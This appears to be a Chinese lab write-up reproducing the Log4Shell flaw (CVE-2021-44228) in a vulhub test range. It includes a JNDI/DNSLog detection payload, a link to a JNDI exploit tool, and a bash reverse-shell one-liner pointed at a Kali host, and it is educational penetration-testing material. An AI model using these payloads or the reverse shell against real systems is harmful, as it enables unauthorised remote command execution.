1.原理
Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。
2.用vulhub 进行靶场搭建
3.利用dnslog 测试是否存在漏洞
通过DNSLog平台(http://www.dnslog.cn/)获取到域名xxx.dnslog.cn,构造payload ${jndi:ldap://http://xxx.dnslog.cn}
查看dnslog有接收到返回数据即存在漏洞
4.漏洞利用
使用jndi漏洞利用工具
下载地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
反弹shell指令是
bash -i >& /dev/tcp/ip/port 0>&1
此处kali得ip为192.168.14.131 端口设置未使用得端口 并将反弹shell进行java runtime bash 编码
kali 设置反弹shell
设置端口监听
浏览器访问payload
端口监听到数据 并且可以进行命令执行
Apache_log4j2(CVE-2021-44228)复现
最新推荐文章于 2024-04-06 17:40:56 发布